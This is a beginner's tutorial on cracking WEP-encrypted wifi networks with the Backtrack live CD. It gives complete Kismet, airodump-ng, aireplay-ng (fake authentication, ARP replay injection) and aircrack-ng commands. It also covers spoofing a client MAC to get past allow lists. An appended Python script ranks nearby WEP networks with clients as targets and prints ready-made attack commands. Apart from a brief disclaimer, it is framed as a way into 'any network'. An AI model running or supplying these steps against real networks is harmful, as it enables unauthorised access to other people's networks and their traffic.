This tutorial is intended for users with little or no experience with Linux or wifi. The folks over
at remote-exploit have released "Backtrack", a tool which makes it ridiculously easy to access any
network secured by WEP encryption. This tutorial aims to guide you through the process of using it
effectively.
What is Backtrack?

Backtrack is a bootable live CD with a myriad of wireless and TCP/IP networking tools. This tutorial
will only cover the included Kismet and aircrack-ng suite of tools.
Glossary

- AP: Access Point, a wireless router.
- MAC address: Media Access Control address, a unique id assigned to wireless adapters and
routers. It is written in hexadecimal as six pairs of digits separated by colons.
- BSSID: the Access Point's MAC address.
- ESSID: the Access Point's broadcast name (ie linksys, default, belkin etc). Some APs will not
broadcast their name, but Kismet may be able to detect it anyway.
- Terminal: an MS-DOS like command line interface. You can open this by clicking the black box
icon next to the start key in Backtrack.
- WEP: short for Wired Equivalent Privacy, a security protocol for Wi-Fi networks.
- WPA: short for Wi-Fi Protected Access, a more secure protocol than WEP for wireless
networks. NOTE: this tutorial does not cover cracking WPA encryption.
Since Backtrack is a live CD running off your CD-ROM, there is nowhere that you can write files to
unless you have a Linux partition on your hard drive or a USB storage device. Backtrack has some
NTFS support, so you will be able to browse to your Windows based hard drive should you have one,
but it will mount the partition as "read-only". I dual boot Windows and Ubuntu on my laptop so I already
have a Linux swap partition and a reiserfs partition. Backtrack had no problem detecting these and
mounting them for me. To find your hard drive or USB storage device, just browse to the /mnt folder in
the file manager. Typically a hard drive will appear named something like hda1, or hda2 if you have
more than one partition on the drive. Alternately hdb1 could show if you have more than one hard
disk. Having somewhere to write files that you can still access if you need to reboot makes the
whole process a little easier: the capture files you create below are useless if they vanish with the live session.
Disclaimer

Hacking into someone's wireless network without permission is probably against the law. I wouldn't
recommend doing it. I didn't break into anyone else's network while learning how to do this.
Step by step

Step 1: Boot Backtrack and find a target with Kismet

Place the Backtrack CD into your CD-ROM drive and boot into Backtrack. You may need to change a
setting in your BIOS to boot from CD-ROM. During boot up you should see a message like "Hit ctrl+esc to
change BIOS settings". Changing your first boot device to CD-ROM will do the trick. Once booted into
Linux, login as root with username root and password toor. These are the default username and
password used by Backtrack. A command prompt will appear. Type startx to start KDE (a 'windows'
like workspace for Linux).
Once KDE is up and running, start Kismet by clicking on the start key and browsing to Backtrack
-> Wireless Tools -> Analyzers -> Kismet. Alternatively you can open a Terminal and type
kismet
Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate
adapter, most likely 'ath0', and sit back as Kismet starts detecting networks in range. If you are not
sure what your wireless adapter is called, list the wireless interfaces from a terminal with
iwconfig
While Kismet detects networks and the various clients accessing those networks, you might want to type
's' and then 'Q' (case sensitive). This sorts all of the APs in your area by their signal strength. The
default 'autofit' mode that Kismet starts up in doesn't allow you much flexibility. By sorting APs by
signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want
more information on. (Side note: when selecting a target AP keep in mind this tutorial only covers
accessing host APs that use WEP encryption. In Kismet the flags for encryption are Y/N/0. Y=WEP,
N=Open network (no encryption), 0=other, most likely WPA.) Further reading on Kismet is
available here.
Select the AP (access point) you want to access. Copy and paste the broadcast name (ESSID), MAC
address (BSSID), and channel number of your target AP into a text editor. Backtrack is KDE based so
you can use kwrite. Just open a terminal and type 'kwrite' or select it from the start button. In
Backtrack's terminal, to copy and paste you use shift+ctrl+c and shift+ctrl+v respectively.

Running Kismet puts your wireless adapter into monitor mode, which airodump and aireplay below
need. You can also use airmon-ng to do this manually; type airmon-ng -h for more help with this.
Step 2: Capture packets with airodump-ng

Open up a new terminal and start airodump so we can collect the encrypted packets (and the IVs they
carry) from the target AP. Airodump is fairly straightforward; for help with this program you can always
type "airodump-ng -h" at the command prompt for additional options.
airodump-ng ath0 -w /mnt/hda1/home/ryan/belkin_slax_rcu 9
Here ath0 is your wireless adapter, -w sets the name prefix for the capture files (written to the
writable partition found earlier, so they survive a reboot), and 9 is the channel number of the target AP
that you noted from Kismet. Leave this terminal running for the rest of the tutorial.
Step 3: Fake authentication with the AP

aireplay-ng -1 0 -e belkin -a <AP MAC address> -h <your adapter's MAC address> ath0

- -1 at the beginning specifies the type of attack. In this case we want fake authentication with the
AP. You can view all options by typing aireplay-ng -h
- 0 specifies the delay in seconds between (re)authentication attempts.
- -e is the ESSID tag. belkin is the ESSID or broadcast name of my target AP. Linksys or default
are other common names.
- -a is the BSSID tag: the value after it is the MAC address of the target AP, as noted from Kismet.
- -h is your wireless adapter's MAC address. You can use macchanger to view and change your
MAC address: macchanger -s ath0
Aireplay reports whether the association succeeded. If it keeps failing, the AP may only accept
clients whose MAC address is on an allow list, in which case you would need to use a MAC address of a
client that is already associated.
Step 4: ARP request replay with aireplay-ng

aireplay-ng -3 -b <AP MAC address> -h <your adapter's MAC address> ath0

- -3 selects the ARP request replay attack: aireplay captures an ARP request on the network and
re-injects it repeatedly, so the AP answers with many new encrypted packets, each carrying a fresh IV.
- -b is the MAC address of the target AP (the same BSSID as in step 3).
- -h is your adapter's MAC address, the one you fake-authenticated with in step 3.
As aireplay runs, the ARP packet count will slowly increase. This may take a while if there aren't many
ARP requests from other computers on the network. As it runs, however, the ARP count should start
to increase more quickly, and the data count in the airodump window should climb with it. If the ARP
count stops increasing, just open up a new terminal and re-associate with the AP via step 3. There is no
need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will
probably need somewhere in the hundreds of thousands of IV data packets for aircrack to break the WEP key.
Step 5: Crack the key with aircrack-ng

Find the location of the captured IVS file you specified in step 2. Then run aircrack-ng against
that file from a terminal.
Once you have enough captured data packets, recovering the key will only take a couple of seconds.
For my AP it took me 380k data packets. If aircrack doesn't find a key almost immediately, just sit
back and wait for more data packets; airodump keeps writing to the same file, so you can simply run
aircrack again later.
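The five steps above pick the target by eye in Kismet and watch the IV count by eye in airodump. The
following script is an added example, not part of the original tutorial or of the aircrack-ng project: it
parses the CSV summary that airodump-ng writes next to its capture (the comma-separated layout of the
aircrack-ng 1.x releases, an assumption; the Backtrack-era version used on this page may write a different
file), picks the strongest WEP AP that has at least one associated client (step 4 needs a client to produce
ARP requests), tells you whether the IV count has reached a threshold worth trying aircrack at, and prints
the step 3 to 5 command lines for that target with placeholders for your own adapter and capture file. The
CSV below is constructed sample data; the MAC addresses and names are not real networks.

```python
import shlex
from dataclasses import dataclass, field

# Constructed sample of an airodump-ng "prefix-01.csv" file (format assumption:
# aircrack-ng 1.x layout). Locally administered 02:... MACs; no real networks.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2007-01-01 12:00:00, 2007-01-01 12:30:00,  9,  54, WEP , WEP, OPN, -40,   1200,  380000,   0.  0.  0.  0,   6, belkin,
02:00:00:00:00:02, 2007-01-01 12:00:00, 2007-01-01 12:30:00,  6,  54, WEP , WEP, OPN, -35,    800,     500,   0.  0.  0.  0,   7, linksys,
02:00:00:00:00:03, 2007-01-01 12:00:00, 2007-01-01 12:30:00, 11,  54, WPA , TKIP, PSK, -30,    900,       0,   0.  0.  0.  0,   7, default,
02:00:00:00:00:04, 2007-01-01 12:00:00, 2007-01-01 12:30:00,  1,  54, OPN , , , -60,    300,       0,   0.  0.  0.  0,   4, open,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:aa, 2007-01-01 12:01:00, 2007-01-01 12:30:00, -50,   15000, 02:00:00:00:00:01, belkin
02:00:00:00:00:bb, 2007-01-01 12:02:00, 2007-01-01 12:30:00, -55,     200, 02:00:00:00:00:03, default
02:00:00:00:00:cc, 2007-01-01 12:03:00, 2007-01-01 12:30:00, -70,      10, (not associated), linksys
02:00:00:00:00:dd, 2007-01-01 12:04:00, 2007-01-01 12:30:00, -45,    3000, 02:00:00:00:00:02, linksys
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str          # e.g. "WEP", "WPA", "OPN"; may list several, space separated
    power: int            # signal; a larger (less negative) value is a stronger signal
    ivs: int              # the "# IV" column: IVs airodump has seen for this AP
    essid: str
    clients: list = field(default_factory=list)   # associated station MACs


def parse_airodump_csv(text: str) -> dict:
    """Return {bssid: AccessPoint} from airodump-ng CSV text, clients attached.

    The file holds two tables (APs, then stations) separated by a blank line.
    """
    aps = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("BSSID,"):
            section = "ap"
            continue
        if line.startswith("Station MAC,"):
            section = "sta"
            continue
        fields = [f.strip() for f in line.split(",")]
        if section == "ap":
            # An ESSID may itself contain commas, so rejoin everything between
            # the ID-length column (index 12) and the trailing Key column.
            essid = ",".join(fields[13:-1])
            aps[fields[0]] = AccessPoint(
                bssid=fields[0], channel=int(fields[3]), privacy=fields[5],
                power=int(fields[8]), ivs=int(fields[10]), essid=essid)
        elif section == "sta":
            bssid = fields[5]               # "(not associated)" never matches an AP
            if bssid in aps:
                aps[bssid].clients.append(fields[0])
    return aps


def select_wep_targets(aps: dict) -> list:
    """WEP APs that have at least one associated client, strongest signal first."""
    candidates = [ap for ap in aps.values()
                  if "WEP" in ap.privacy.split() and ap.clients]
    return sorted(candidates, key=lambda ap: ap.power, reverse=True)


def enough_ivs(ap: AccessPoint, threshold: int = 100_000) -> bool:
    """Worth running aircrack-ng yet? Assumed starting point: 100k IVs.

    The tutorial's author needed 380k; keep capturing and retry if it fails.
    """
    return ap.ivs >= threshold


def attack_commands(ap: AccessPoint, iface: str = "ath0",
                    my_mac: str = "<your adapter MAC>",
                    capture: str = "<capture file from step 2>") -> list:
    """Steps 3 to 5 from the tutorial filled in for one target (placeholders for
    your own adapter and capture file). aircrack-ng's -b option restricts the
    crack to one BSSID."""
    return [
        f"aireplay-ng -1 0 -e {shlex.quote(ap.essid)} -a {ap.bssid} -h {my_mac} {iface}",
        f"aireplay-ng -3 -b {ap.bssid} -h {my_mac} {iface}",
        f"aircrack-ng -b {ap.bssid} {capture}",
    ]


if __name__ == "__main__":
    aps = parse_airodump_csv(SAMPLE_CSV)
    for ap in select_wep_targets(aps):
        status = "enough IVs, try aircrack" if enough_ivs(ap) else "keep capturing"
        print(f"{ap.essid} {ap.bssid} ch{ap.channel} power={ap.power} "
              f"ivs={ap.ivs} clients={len(ap.clients)}: {status}")
        for cmd in attack_commands(ap):
            print("   ", cmd)
```

On the sample data the WPA network is skipped, the strongest WEP network (linksys) is listed first but
has only 500 IVs, and belkin is reported as ready for aircrack with 380k. Point the parser at the real
`-01.csv` file written next to your capture from step 2 and re-run it while aireplay is injecting.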
If this guide doesn't fully answer your questions you can always refer to the forums at
remote-exploit.org